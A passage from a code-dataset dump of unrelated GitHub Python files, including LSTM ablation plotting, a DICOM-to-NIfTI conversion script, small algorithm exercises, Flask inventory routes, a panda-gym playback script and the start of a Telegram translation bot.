diff_tl.cpu().detach().numpy()\n \n \n hidden = repackage_hidden(hidden) \n count +=1\n\n diff_arr_fl /= float(count); diff_arr_sl /= float(count); diff_arr_tl /= float(count);\n \n return [diff_arr_fl[1:],diff_arr_sl[1:],diff_arr_tl[1:] ] #total_loss.item() / len(data_source) \n\n\nfrom scipy.optimize import curve_fit\ndef linf(x, A, B, C): # this is your 'straight line' y=f(x) for straight line make B = 1 \n return A*(x**B) + C\n\ndef expf(x, a, b, c):\n return a * np.exp(-b * x) + c\n\ndef explinf(x, a, b, c,d):\n return a * np.exp(-b * x) + c*(x**(d)) \n\nfrom lmfit import Model\ngmodel = Model(explinf)\nexpmodel = Model(expf)\nlinmodel = Model(linf)\n\nimport math\ndef sigmoid(x):\n return 1 / (1 + math.exp(-x))\nimport statistics\nfrom sklearn.metrics import mean_squared_error\ndef plotting_model_ablation():\n \n model_name = ['PTB_1000_epochs.pt', 'PTB_l1_3_4_l2_pareto.pt','PTB_modular_80_20.pt'] #'PTB_custom_grad20_fix70.pt'\n piclab = ['Baseline','Pareto','Mod80'] \n \n fig3, axs3 = plt.subplots(1, 3, figsize=(10, 4), sharey=True)\n \n for i in range(len(model_name)):\n ##load model\n try: cci.download_to_file('shivangi/'+ model_name[i], model_name[i])\n except: print('Not in file format', model_name[i])\n model_load(model_name[i])\n\n ###################################################################################\n #print model performance\n if False:\n print('Model is',model_name[i])\n test_loss = evaluate(test_data, test_batch_size)\n print('=' * 89)\n print('| End of training | test loss {:5.2f} | test ppl {:8.2f} | test bpc {:8.3f}'.format(\n test_loss, math.exp(test_loss), test_loss / math.log(2)))\n print('=' * 89)\n \n #add MI plot on curves\n MI_path = ('/home/shivangi/lstm-timescales/mutual_information/MI_results_PTB_01.npz')\n mi_data = np.load(MI_path, allow_pickle=True)\n mi, var_mi = mi_data['all_MI']\n shuf_mi, var_shuf_mi = mi_data['shuff_MI']\n distance = np.arange(1, 101)\n MI = mi - shuf_mi\n ##################################################################################\n #load ablation arrays \n fig1, axs1 = plt.subplots(1, 3, figsize=(10, 4), sharey=True)\n fig2, axs2 = plt.subplots(1, 3, figsize=(10, 4), sharey=True)\n\n arr_name = 'diff_arr_all_'+model_name[i].split('.')[0]\n try: \n diff_arr_all = cci.download_npy_array(arr_name)\n print('Downloaded from CC')\n except: \n print('Running ablation and saving array') \n diff_arr_all = model_ablation(test_data, test_batch_size)\n cci.upload_npy_array(arr_name,diff_arr_all) \n\n print('Model is',model_name[i])\n for j in range(len(diff_arr_all)):\n print('Layer is ',j )\n diff_arr = diff_arr_all[j]\n ax1 = axs1[j]; ax2 = axs2[j] ; ax3 = axs3[j] ;\n \n semi_log = True; log_log=True\n if semi_log: \n ax3.plot((np.arange(1,len(diff_arr)+1)),(diff_arr), label = piclab[i]);\n ax3.set_ylabel('L2 norm btw cell states'); ax3.set_xlabel('Ablated word pos')\n ax3.set_title('For LSTM layer '+str(j+1))\n ax3.legend(loc='upper right')\n ax3.set_yscale('log');\n if log_log:\n ax1.plot((np.arange(1,len(diff_arr)+1)),(diff_arr), label = piclab[i]);\n ax1.plot((np.arange(1,len(diff_arr)+1)),(MI[:len(diff_arr)]), label = 'MI_PTB');\n ax1.set_ylabel('L2 norm btw cell states'); ax1.set_xlabel('Ablated word pos')\n #ax1.set_yscale('log'); ax1.set_xscale('log')\n \n\n #Plot slope of curve fit to log-log graph\n x,y = (np.arange(1,len(diff_arr)+1)), (diff_arr) \n \n #coeff of exp and poly are init to constant\n a,c = 0.1,1\n # grid search values for b and d\n bd_list = [(b,d) for b in np.arange(0.1,1.5,0.1) for d in np.arange(-1,1,0.1)]\n h = defaultdict(dict)\n mse = []\n combined_model = True\n separate = False\n if combined_model:\n for count, (b,d) in enumerate(bd_list):\n params = gmodel.make_params()\n params.add('a',value=a, min=0)\n params.add('c',value=c, min=0)\n params.add('b',value=b)\n params.add('d',value=d)\n\n try:\n result = gmodel.fit(y, params, x=x) \n [a,b,c,d] = [result.params['a'].value, result.params['b'].value, result.params['c'].value, result.params['d'].value]\n if j not in h[i]: h[i][j] = {}\n \n mse.append(mean_squared_error(y, explinf(x, a,b,c,d)))\n \n h[i][j][count] = [(round(a,2),round(b,2),round(c,2),round(d,2))]\n \n except:\n continue\n \n #retreive opt a,b,c,d by taking arg min ove mse lsit\n (a_opt,b_opt,c_opt,d_opt) = h[i][j][np.argmin(np.array(mse))][0]\n ax1.plot(x,explinf(x, a_opt,b_opt,c_opt,d_opt),'m--',label = 'both')\n ax1.plot(x,explinf(x, a_opt,b_opt,0,0),'k--',label = 'expo only') \n ax1.plot(x,explinf(x, 0, 0, c_opt,d_opt),'r--',label = 'poly only')\n ax1.set_ylim([0.01 , 1])\n ax2.plot(mse)\n \n elif separate: \n paramse = expmodel.make_params( a=a, b=b, c=0.25)\n resulte = expmodel.fit(y, paramse,x=x)\n [a,b,c] = [resulte.params['a'].value, resulte.params['b'].value, resulte.params['c'].value]\n print('Coeffs of exp',a,b,c)\n ax1.plot(x,expf(x, a,b,c),'k--',label = 'expo')\n \n \n params = linmodel.make_params( A=c, B=d, C=0.25)\n result = linmodel.fit(y, params, x=x)\n [A,B,C] = [result.params['A'].value, result.params['B'].value, result.params['C'].value]\n print('Coeffs of lin',A,B,C)\n ax1.plot(x,linf(x,A,B,C),'r--',label = 'poly')\n\n\n ax1.set_title('For LSTM layer '+str(j+1))\n ax1.legend(loc='lower left')\n ax1.set_yscale('log'); ax1.set_xscale('log') \n\n #if (j==len(model_name)-1):\n for ax in axs1.flat: \n ax.label_outer()\n for ax in axs2.flat:\n ax.label_outer()\n \n \n fig1.savefig('Log_diff_log_x_0216_combined_'+model_name[i].split('.')[0]+'_'+str(round(b,2))+'_'+str(round(d,2))+'.png')\n fig2.savefig('MSE_0207_'+model_name[i].split('.')[0])\n \n for ax in axs3.flat:\n ax.label_outer()\n fig3.savefig('Log_diff_x_0216_top_3.png')\n\nplotting_model_ablation()\n\n## Plotting forget bias values initial vs final for Chrono-grad\ndef plotting_grad_bias():\n model_name = ['PTB_asgd_grad_tmax_20.pt' , 'PTB_asgd_grad_tmax_70.pt', 'PTB_asgd_grad_tmax_200.pt' ]\n piclab = ['g20','g70','g200']\n Tmin = 1; Tmax_l = [20, 70, 200]\n hid_dim = [1150,1150,400]\n \n for i in range(3):\n model_load(model_name[i])\n Tmax = Tmax_l[i]\n dict_param = dict(model.named_parameters())\n \n for l in range(3):\n diff = (Tmax - 1 - Tmin)\n forget_gate_bias_bfore_training = np.log(Tmin + ( (diff*np.arange(hid_dim[l])) / (hid_dim[l]-1) ) )\n forget_gate_bias_after_training = (dict_param['rnns.'+str(l)+'.module.bias_ih_l0'].data[hid_dim[l]:hid_dim[l]*2].cpu() + dict_param['rnns.'+str(l)+'.module.bias_hh_l0'].data[hid_dim[l]:hid_dim[l]*2].cpu())\n\n plt.figure(l+1); plt.plot(forget_gate_bias_bfore_training,forget_gate_bias_after_training,label='g'+str(Tmax))\n plt.axis([0, 6 , -5 ,5])\n plt.xlabel('Forget gate bias initialization'); plt.ylabel('Forget gate bias after training')\n plt.title('Bias values for layer '+str(l+1))\n\n for l in range(3):\n plt.figure(l+1);plt.legend(loc='upper left'); \n plt.savefig('Grad_model_forget_bias_hidden_'+str(l+1)+'.png') \n \n#plotting_grad_bias()\n\ndef plotting_fix_bias():\n ## Plotting cosine distance between hidden/cell state for fixed models \n #model_name = ['PTB_asgd_orig.pt', 'PTB_fixed_tmax_20_nograd.pt', 'PTB_fixed_tmax_70_nograd.pt','PTB_fixed_tmax_200_nograd.pt']\n\n #model_name = ['PTB_asgd_orig.pt' ,'PTB_asgd_fixed_tmax_20.pt', 'PTB_asgd_fixed_tmax_70.pt', 'PTB_asgd_fixed_tmax_200.pt' ]\n #piclab = ['orig','f20','f70','f200']\n #piclab_in = ['orig_init','f20_init','f70_init','f200_init']\n \n #model_name = ['PTB_1000_epochs.pt','PTB_custom_20.pt', 'PTB_custom_70.pt','PTB_custom_grad20_fix70.pt']\n #piclab = ['orig','T20','T70','modular']\n\n model_name = ['PTB_1000_epochs.pt','PTB_custom_5.pt', 'PTB_custom_10.pt','PTB_custom_20.pt','PTB_custom_30.pt','PTB_custom_70.pt','PTB_custom_grad20_fix70.pt','PTB_modular_80_20.pt']\n piclab = ['orig_1k','T5','T10','T20','T30','T70','Mod5','Mod8']\n\n\n hid_dim = [1150,1150,400]\n #Tmax_l = [10, 20,70,200]\n\n for i in range(len(model_name)):\n model_load(model_name[i])\n #fixed_bias = np.log([Tmax_l[i]-1,Tmax_l[i]/2-1,Tmax_l[i]/4-1])\n dict_param = dict(model.named_parameters())\n \n for l in range(2,3):\n #forget_gate_bias_bfore_training = fixed_bias[l]*np.ones(hid_dim[l]) \n forget_gate_bias_after_training = (dict_param['rnns.'+str(l)+'.module.bias_ih_l0'].data[hid_dim[l]:hid_dim[l]*2].cpu() + dict_param['rnns.'+str(l)+'.module.bias_hh_l0'].data[hid_dim[l]:hid_dim[l]*2].cpu())\n #forget_gate_bias_sorted = np.cumsum(np.sort(forget_gate_bias_after_training))\n \n plt.figure(l+1); \n plt.plot(np.sort(forget_gate_bias_after_training),label=piclab[i])\n #plt.plot(forget_gate_bias_bfore_training,label=piclab_in[i])\n plt.xlabel('Hidden units'); plt.ylabel('Forget gate bias (sorted)')\n plt.title('Forget gate bias after training for layer '+str(l+1))\n\n for l in range(2,3):\n plt.figure(l+1);plt.legend(loc='upper left');\n plt.savefig('Custom_fg_bias_fixed_'+str(l+1)+'.png')\n #plt.savefig('Fixed_model_nograd_bias_bf_af_'+str(l+1)+'.png')\n\n#plotting_fix_bias()\n\n\n#1. Distribution plot: hidden units vs. old/new value\n#2. Cell state visualization as a heat map (for units vs. ablated positions) (seaboard - look at Shailee’s notebook)\n#3. Distance vs. position plot: ylim same across layers - get code from Shailee for subplots!\n","repo_name":"shivangi-mahto/brain_teaser","sub_path":"util_functions.py","file_name":"util_functions.py","file_ext":"py","file_size_in_byte":34735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70020063121","text":"\"\"\"Nii conversion with matlab, currently preferred version.\"\"\"\n#%%\nimport shutil\nimport os\nfrom os.path import join, split\nfrom pathlib import Path\nimport json\nimport pickle\nfrom utilities.basic import list_subdir, move_compress, remove_files\nimport matlab.engine\nimport numpy as np\nimport warnings\n\n\n# paths\nscript_dir = os.path.realpath(__file__)\nbase_dir = Path(script_dir).parent\ntables_dir = join(base_dir, 'data', 'tables')\ndisk_data_dir = join(\"F:\\\\\", 'CoBra', 'Data')\ntgt_dir = join(disk_data_dir, 'volume_cross_nii', 'input', 'nii_files')\ntmp_dir = join(disk_data_dir, 'volume_cross_nii', 'temp')\n#excl_files_dir = join(tmp_dir, 'spm_conv_error', 'cut_off')\nexcl_files_dir = [join(disk_data_dir, 'volume_longitudinal_nii', 'input', 'nii_files'), \n join(disk_data_dir, 'volume_cross_nii', 'input', 'nii_files'),\n join(disk_data_dir, 'volume_cross_nii', 'temp', 'dcm2nii_conv_error','corrupted'),\n join(disk_data_dir, 'volume_cross_nii', 'temp', 'spm_conv_error','corrupted'),\n join(disk_data_dir, 'volume_cross_nii', 'input', 'seg_failed'),\n join(disk_data_dir, 'volume_cross_nii', 'input','nii_files', 'segmented'),\n join(disk_data_dir, 'volume_longitudinal_nii', 'input', 'nii_files','segmented'),\n ]\ndata_dir = join(base_dir, 'data')\ndata_cross_dir = join(data_dir, 't1_cross')\ndata_long_dir = join(data_dir, 't1_longitudinal')\n# matlab engine\neng = matlab.engine.start_matlab()\neng.addpath('C:\\\\Users\\\\kiril\\\\Thesis\\\\CoBra\\\\cobra\\\\dcm2nii\\\\dcm2nii_mat\\\\functions', nargout=0)\neng.addpath('C:\\\\Users\\\\kiril\\\\Thesis\\\\CoBra\\\\cobra\\\\dcm2nii\\\\dcm2nii_mat\\\\dcm2nii')\neng.addpath('C:\\\\Users\\\\kiril\\\\Thesis\\\\CoBra\\\\cobra\\\\dcm2nii\\\\dcm2nii_mat\\\\spm12')\n# load necessary files\nwith open(join(tables_dir, 'newIDs_dic.pkl'), 'rb') as f:\n id_dic = pickle.load(f)\nwith open(join(data_dir,'patient_groups', \"3dt1_sids.pkl\"), 'rb') as f:\n sids_ls = pickle.load(f)\nwith open(join(tables_dir, \"disk_series_directories.json\"), 'rb') as f:\n dir_dic = json.load(f)\ndownloaded_sids = np.loadtxt(join(disk_data_dir,'dcm', 'volume_log.txt'), dtype=str).tolist()\n\nsids_ls = list(set(sids_ls).intersection(set(downloaded_sids)))\nwarnings.warn(\"Don't forget to update volume_dir_dic\")\nprint('Take only sids that are in volume_dir_dic')\nsids_ls = list(set(sids_ls).intersection(set(dir_dic.keys())))\n\n# define functions\ndef get_missing_files(sids_to_conv, nii_dir, newid_dic, excl_nii_dir=None):\n \"\"\"\n sids_to_conv: List of SeriesInstanceUIDs that need to be converted to nii\n nii_dir: str, directory where converted files are placed\n newid_dic: dictionary used to map sids to 6 digit new ids\n returns: list of missing files sids\n \"\"\"\n inv_map = {v: k for k, v in newid_dic.items()}\n print(nii_dir)\n conv_files_ids = [file[:-7] for file in os.listdir(nii_dir) if file.endswith('.nii.gz')]\n print(conv_files_ids)\n conv_files_sids = [inv_map[id] for id in conv_files_ids]\n if not isinstance(excl_nii_dir, type(None)):\n print('exclude files in', excl_nii_dir)\n if isinstance(excl_nii_dir, list):\n excl_files_sids = []\n for dir_ in excl_nii_dir:\n excl_files_ids = [file[:-7] for file in os.listdir(dir_) if file.endswith('.nii.gz')]\n excl_files_sids_temp = [inv_map[id] for id in excl_files_ids]\n excl_files_sids = excl_files_sids + excl_files_sids_temp\n else:\n excl_files_ids = [file[:-7] for file in os.listdir(excl_nii_dir) if file.endswith('.nii.gz')]\n excl_files_sids = [inv_map[id] for id in excl_files_ids]\n missing_files = (set(sids_to_conv).difference(set(conv_files_sids))).difference(set(excl_files_sids))\n return list(missing_files)\n\n\ndef dcm2nii_mat(src_dir, tgt_path, tmp_dir, test=False):\n \"\"\"Converts dcm to nii using dcm2nii (matlab) or spm12 (matlab) if first fails\n src_dir: Directory with dcm series\n tgt_path: Full path of the nii file that will be produced (should end with .nii.gz)\"\"\"\n \n try:\n eng.spm12_main(src_dir, tmp_dir)\n except:\n # sometimes .nii files are produced that look reasonable\n # rename them and keep them in these folder\n nii_files = list_subdir(tmp_dir, '.nii')\n if len(nii_files)==1:\n move_compress(nii_files[0], join(tmp_dir, 'spm_conv_error', split(tgt_path)[1]), True)\n remove_files(tmp_dir, ending='.nii.gz')\n remove_files(tmp_dir, ending='.nii')\n print(\"spm failed, try dcm2nii\")\n try:\n eng.dcm2nii_main(src_dir, tmp_dir)\n except:\n nii_files = list_subdir(tmp_dir, '.nii')\n if len(nii_files)==1:\n shutil.move(nii_files[0], join(tmp_dir, 'dcm2nii_conv_error', split(tgt_path)[1][:-3]))\n remove_files(tmp_dir, ending='.nii.gz')\n remove_files(tmp_dir, ending='.nii')\n print('x')\n out_files = list_subdir(tmp_dir, ending='.nii.gz')\n if len(out_files)==0:\n pass\n elif len(out_files)==1:\n shutil.move(out_files[0], tgt_path)\n else:\n for out_file in out_files:\n shutil.move(out_file, join(tmp_dir, 'dcm2nii_conv_error', split(tgt_path)[1]))\n return 0\ndef dcm2nii_mat_main(sids_ls, id_dic, tmp_dir, tgt_dir, excl_files_dir=None, test=False):\n \"\"\"sids_ls: List of sids that need to be converted\"\"\"\n missing_files = get_missing_files(sids_ls, tgt_dir, id_dic, excl_files_dir)\n print(len(missing_files), ' files will be converted')\n if test:\n missing_files = missing_files[:3]\n sids = [split(f)[1] for f in missing_files]\n tgt_paths = [join(tgt_dir, id_dic[sid]+'.nii.gz') for sid in sids]\n src_dirs = [dir_dic[sid] for sid in sids]\n mp_input = [(src_dir, tgt_path) for src_dir, tgt_path in zip(src_dirs, tgt_paths)]\n for src_dir, tgt_path in mp_input:\n dcm2nii_mat(src_dir, tgt_path, tmp_dir)\n \nif __name__ == '__main__':\n dcm2nii_mat_main(sids_ls, id_dic, tmp_dir, tgt_dir, excl_files_dir, test=False)","repo_name":"kirilklein/CoBra","sub_path":"cobra/conv_mat_move_files_for_pred.py","file_name":"conv_mat_move_files_for_pred.py","file_ext":"py","file_size_in_byte":5976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38020926018","text":"# Find 2 numbers that sum target\ndef find2NumsSum(array, target):\n i = 0\n dict_sums = {}\n sln = []\n while i < len(array):\n if array[i] not in dict_sums.values():\n dict_sums[array[i]] = target - array[i]\n else: \n sln.append([ array[i], target - array[i] ]) \n i += 1\n return(sln)\n\n\n\n# Find 3 numbers that sum target\ndef find3Numbers(array, target): \n arr_size = len(array)\n \n for i in range(0, arr_size-1): \n # Find pair in subarray A[i + 1..n-1] \n # with sum equal to sum - A[i] \n s = set() \n curr_sum = target - array[i] \n for j in range(i + 1, arr_size): \n if (curr_sum - array[j]) in s: \n print(\"Triplet is\", array[i], \n \", \", array[j], \", \", curr_sum-array[j]) \n return True\n s.add(array[j]) \n print(s)\n \n return False\n \n\n# Find 4 numbers that sum target\ndef find4NumsSum(array, target):\n pass\n\n\n\n\narray2 = [1,2,3,4,5,6,7,8] \n# print(find2NumsSum(array2, 9))\n\nprint(find3Numbers(array2, 13))","repo_name":"johanaluna/Code_Interviews","sub_path":"AlgoExpert/FindX_NumSum.py","file_name":"FindX_NumSum.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"295174266","text":"# https://www.codewars.com/kata/5d98b6b38b0f6c001a461198/train/python\n\ndef code(strng):\n result = \"\"\n for c in strng:\n digit = ord(c)-ord(\"0\")\n binary = format(f\"{digit:b}\")\n k = len(binary)\n result += \"\".join([\"0\"]*(k-1)) + \"1\" + binary\n return result\n \ndef decode(strng):\n current = 0\n i = strng.find(\"1\",current)\n result = \"\"\n while i >= 0 :\n k = i-current + 1\n current = i+1\n binary = strng[current:current+k]\n digit = int(binary,2)\n result += str(digit)\n current += k\n i = strng.find(\"1\",current)\n return result\n\nprint(decode(\"10001111\"))","repo_name":"ankurgoel77/codewars","sub_path":"binaries.py","file_name":"binaries.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26944224242","text":"# NAME: Javier E. Zapanta (j.zapanta@snhu.edu)\n# DATE: 2019 May 10\n# COURSE: IT-140\n# PROGRAM: Basic Arithmetic\n#\n# PURPOSE: This program will use basic arithmetic operators to perform basic computations.\n# RUNTIME: Python 2+\n#\n# CREDIT: Knowlton, T., & Hunt, B. (2002). Introduction to Computer Science using C++ (3rd ed.). Boston, MA: Thomson Learning, Inc. Retrieved from http://www.programcpp.com\n\n# initialize variables to values\ni = 2\nj = 3\nk = 4\n\na = 0.5\nb = 3.0\n\n# addition\nl = i + 2\nprint (l)\n\n# subtraction\nl = l - j\nprint (l)\n\n# multiplication (*)\nl = i * j * k\nprint (l)\n\n# division (/)\nl = k / i\nprint (l)\n\n# floating-point multiplication\nc = b * a\nprint (c)\n\n# floating-point division\nc = b / a\nprint (c)\n","repo_name":"jzapanta-snhu/it-140-zapanta-examples","sub_path":"module01/03_arithmetic.py","file_name":"03_arithmetic.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6105762642","text":"from flask import ( \n render_template, \n request,\n redirect,\n url_for,\n flash\n )\nfrom app import app, db\nfrom datetime import datetime\nfrom app.database import Product, Review\nfrom app.forms import ProductForm, ReviewForm\n\n@app.route(\"/\")\ndef index():\n version = {\n \"ok\" : True,\n \"message\" : \"success\",\n \"version\" : \"1.0.0\",\n \"server_time\" : datetime.now().strftime(\"%F %H:%M:%S\")\n }\n return render_template(\"index.html\", version=version)\n\n# Read\n@app.route(\"/products\")\ndef get_products():\n products = Product.query.filter_by(active=True)\n return render_template(\"product_list.html\", product_list=products)\n\n@app.route(\"/products/<int:pid>\")\ndef get_product_detail(pid):\n product = Product.query.filter_by(id=pid).first()\n reviews = Review.query.filter_by(product_id=pid)\n return render_template(\"product_detail.html\", product=product, reviews=reviews)\n\n# Create\n@app.route(\"/products/registration\")\ndef create_product_form():\n prod_form = ProductForm()\n return render_template(\"create_form.html\", form=prod_form)\n\n@app.route(\"/products\", methods=[\"POST\"])\ndef create_product():\n \"\"\"Create a new product\"\"\"\n form = ProductForm(request.form)\n if form.validate():\n product = Product()\n product.name = form.name.data\n product.price = form.price.data\n product.quantity = form.quantity.data\n product.description = form.description.data\n product.category = form.category.data\n product.unique_tag = form.unique_tag.data\n db.session.add(product)\n db.session.commit()\n flash(f\"Product {product.name} created!\")\n return redirect(url_for('get_products'))\n\n flash(\"Invalid data\")\n return redirect(url_for('get_products'))\n\n# update product\n@app.route(\"/products/modifications/<int:pid>\")\ndef update_product_form(pid):\n form = ProductForm()\n product = Product.query.filter_by(id=pid).first()\n return render_template(\"update_form.html\", form=form, product=product)\n\n@app.route(\"/products/<int:pid>\", methods=[\"POST\"])\ndef update_product(pid):\n form = ProductForm(request.form)\n if (form.validate()):\n product = Product.query.filter_by(id=pid).first()\n product.name = form.name.data\n product.price = form.price.data\n product.quantity = form.quantity.data\n product.description = form.description.data\n product.category = form.category.data\n product.unique_tag = form.unique_tag.data\n db.session.commit()\n flash(f\"Product {product.name} Updated!\")\n return redirect(url_for('get_products'))\n \n flash(\"Invalid Data!\")\n return redirect(url_for('get_products'))\n\n# Delete\n@app.route(\"/products/delete/<int:pid>\", methods=[\"POST\"])\ndef delete_product(pid):\n product = Product.query.filter_by(id=pid).first()\n if product is None:\n flash(f\"Product {pid} does not exist\")\n return redirect(url_for('get_products'))\n\n product.active = False\n db.session.commit()\n flash(f\"Product {product.name} Deleted!\")\n return redirect(url_for('get_products'))\n \n# Undo delete\n@app.route(\"/products/deleted\")\ndef get_deleted_products():\n products = Product.query.filter_by(active=False)\n return render_template(\"product_list_deleted.html\", product_list=products)\n\n@app.route(\"/products/undo_delete/<int:pid>\", methods=[\"POST\"])\ndef undo_delete_product(pid):\n product = Product.query.filter_by(id=pid).first()\n if product is None:\n flash(f\"Product {pid} does not exist\")\n return redirect(url_for('get_deleted_products'))\n\n product.active = True\n db.session.commit()\n flash(f\"Product {product.name} Restored!\")\n return redirect(url_for('get_deleted_products'))\n\n # Hard delete\n@app.route(\"/products/hard_delete/<int:pid>\", methods=[\"POST\"])\ndef hard_delete_product(pid):\n product = Product.query.filter_by(id=pid).first()\n if product is None:\n flash(f\"Product {pid} does not exist\")\n return redirect(url_for('get_deleted_products'))\n\n db.session.delete(product)\n db.session.commit()\n flash(f\"Product {product.name} deleted completely from Database!\")\n return redirect(url_for('get_deleted_products'))\n\n\n# Create Review\n@app.route(\"/review/create_form/<int:pid>\")\ndef create_review_form(pid):\n product = Product.query.filter_by(id=pid).first()\n review_form = ReviewForm()\n return render_template(\"create_review_form.html\", form=review_form, product=product)\n\n@app.route(\"/review/<int:pid>\", methods=[\"POST\"])\ndef create_review(pid):\n \"\"\"Creating a review\"\"\"\n form = ReviewForm(request.form)\n\n product = Product.query.filter_by(id=pid).first()\n if product is None:\n flash(f\"Product {pid} does not exist\")\n return redirect(url_for('get_products'))\n if form.validate():\n review = Review()\n review.author = form.author.data\n review.rating = form.rating.data\n review.review_text = form.review_text.data\n review.product_id = form.product_id.data\n db.session.add(review)\n db.session.commit()\n flash(f\"Review created!\")\n return redirect(url_for('get_product_detail', pid=pid))\n\n flash(\"Invalid data\")\n return redirect(url_for('get_product_detail', pid=pid))","repo_name":"jmacach1/flask_inventory_manager","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7167874096","text":"import gym\nimport panda_gym\nfrom stable_baselines3 import PPO, SAC\nfrom sb3_contrib import TQC\nimport custom_envs\n\n\"\"\"\nenv_list = ['My_PandaReach', 'Two_PandaReach', 'Three_PandaReach',\n 'My_PandaSlide',\n 'My_PandaPickAndPlace', 'My_TwoPandaPickAndPlace',\n 'Two_PandaPush', 'Three_PandaPush',\n 'Two_Obj_PandaPush', 'Three_Obj_PandaPush',\n 'My_PandaReachPlate', 'My_TwoPandaReachPlate',\n 'My_PandaStack']\n\nenv_opts = ['Joints', 'Dense']\n\"\"\"\n\nenv_id = 'My_PandaReachJointsDense'\nalgorithm_name = 'TQC'\n\nenv = gym.make(env_id + '-v1', render=True)\n\ncommand = algorithm_name + \".load('./trained/' + env_id + '/' + env_id + algorithm_name, env=env)\"\n\nmodel = eval(command)\n\nobs = env.reset()\nfor i in range(1000):\n action, _state = model.predict(obs, deterministic=True)\n obs, reward, done, info = env.step(action)\n print(info)\n env.render()\n if done:\n print('Done')\n obs = env.reset()\n","repo_name":"zeyang23/panda_robot_task","sub_path":"show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"1425205682","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# from bot_log import log_file\n\n\nfrom collections import UserDict\nimport pickle\nimport telebot\nfrom phrases_list import help_bot\nfrom bot_token import bot\nfrom telebot import types\n\n\nclass Singleton(object):\n _instance = None\n\n\n def __new__(class_, *args, **kwargs):\n\n if not isinstance(class_._instance, class_):\n class_._instance = object.__new__(class_, *args, **kwargs)\n\n return class_._instance\n \nclass UserLang(Singleton, UserDict):\n\n def add_data(self, user_id, lang_dict) -> None:\n \n self.load_data()\n\n if user_id in self.data:\n self.data[user_id].update(lang_dict)\n\n else:\n self.data[user_id] = lang_dict\n self.save_data()\n\n def delete_data(self, user_id, key_lang) -> None:\n self.load_data()\n if user_id in self.data:\n del self.data[user_id][key_lang]\n self.save_data()\n\n def save_data(self) -> None:\n\n with open(\".\\\\user_lang_dict.bin\", \"wb\") as file:\n pickle.dump(self.data, file)\n\n\n def load_data(self) -> None:\n\n try:\n\n with open(\".\\\\user_lang_dict.bin\", \"rb\") as file:\n self.data = pickle.load(file)\n return self.data \n\n except FileNotFoundError:\n\n with open(\".\\\\user_lang_dict.bin\", \"wb\") as file:\n pickle.dump({}, file)\n\n with open(\".\\\\user_lang_dict.bin\", \"rb\") as file:\n return \n\nLANG_DICT = {\n\"af\": \"afrikaans\", \"sq\": \"albanian\", \"am\": \"amharic\", \"ar\": \"arabic\", \"hy\": \"armenian\", \"az\": \"azerbaijani\", \n\"eu\": \"basque\", \"be\": \"belarusian\", \"bn\": \"bengali\", \"bs\": \"bosnian\", \"bg\": \"bulgarian\", \"ca\": \"catalan\", \"ceb\": \"cebuano\", \n\"ny\": \"chichewa\", \"zh-cn\": \"chinese - simplified\", \"zh-tw\": \"chinese - traditional\", \"co\": \"corsican\", \"hr\": \"croatian\", \n\"cs\": \"czech\", \"da\": \"danish\", \"nl\": \"dutch\", \"en\": \"english\", \"eo\": \"esperanto\", \"et\": \"estonian\", \"tl\": \"filipino\", \"fi\": \"finnish\", \n\"fr\": \"french\", \"fy\": \"frisian\", \"gl\": \"galician\", \"ka\": \"georgian\", \"de\": \"german\", \"el\": \"greek\", \"gu\": \"gujarati\", \"ht\": \"haitian creole\", \n\"ha\": \"hausa\", \"haw\": \"hawaiian\", \"iw\": \"hebrew iw\", \"he\": \"hebrew\", \"hi\": \"hindi\", \"hmn\": \"hmong\", \"hu\": \"hungarian\", \"is\": \"icelandic\", \n\"ig\": \"igbo\", \"id\": \"indonesian (bahasa)\", \"ga\": \"irish\", \"it\": \"italian\", \"ja\": \"japanese\", \"jw\": \"javanese\", \"kn\": \"kannada\", \"kk\": \"kazakh\", \n\"km\": \"khmer\", \"ko\": \"korean\", \"ku\": \"kurdish (kurmanji)\", \"ky\": \"kyrgyz\", \"lo\": \"lao\", \"la\": \"latin\", \"lv\": \"latvian\", \"lt\": \"lithuanian\", \n\"lb\": \"luxembourgish\", \"mk\": \"macedonian\", \"mg\": \"malagasy\", \"ms\": \" \", \"ml\": \"malayalam\", \"mt\": \"maltese\", \"mi\": \"maori\", \n\"mr\": \"marathi\", \"mn\": \"mongolian\", \"my\": \"myanmar (burmese)\", \"ne\": \"nepali\", \"no\": \"norwegian\", \"or\": \"odia\", \"ps\": \"pashto\", \n\"fa\": \"persian\", \"pl\": \"polish\", \"pt\": \"portuguese\", \"pa\": \"punjabi\", \"ro\": \"romanian\", \"ru\": \"russian\", \"sm\": \"samoan\", \n\"gd\": \"scots gaelic\", \"sr\": \"serbian\", \"st\": \"sesotho\", \"sn\": \"shona\", \"sd\": \"sindhi\", \"si\": \"sinhala\", \"sk\": \"slovak\", \"sl\": \"slovenian\", \n\"so\": \"somali\", \"es\": \"spanish\", \"su\": \"sundanese\", \"sw\": \"swahili\", \"sv\": \"swedish\", \"tg\": \"tajik\", \"ta\": \"tamil\", \"te\": \"telugu\", \n\"th\": \"thai\", \"tr\": \"turkish\", \"uk\": \"ukrainian\", \"ur\": \"urdu\", \"ug\": \"uyghur\", \"uz\": \"uzbek\", \"vi\": \"vietnamese\", \"cy\": \"welsh\", \n\"xh\": \"xhosa\", \"yi\": \"yiddish\", \"yo\": \"yoruba\", \"zu\": \"zulu\"}\n\n\nlang_transl = UserLang()\ninput_lang = \"en\"\nfind_lang = {}\n\n\ndef chose_button(message, id_mess, text=\"\", flag_dict=None):\n\n if message.chat.id not in lang_transl:\n lang_transl[message.chat.id] = {}\n if flag_dict == \"added\":\n keyboard = types.InlineKeyboardMarkup()\n bt_in_line = []\n for 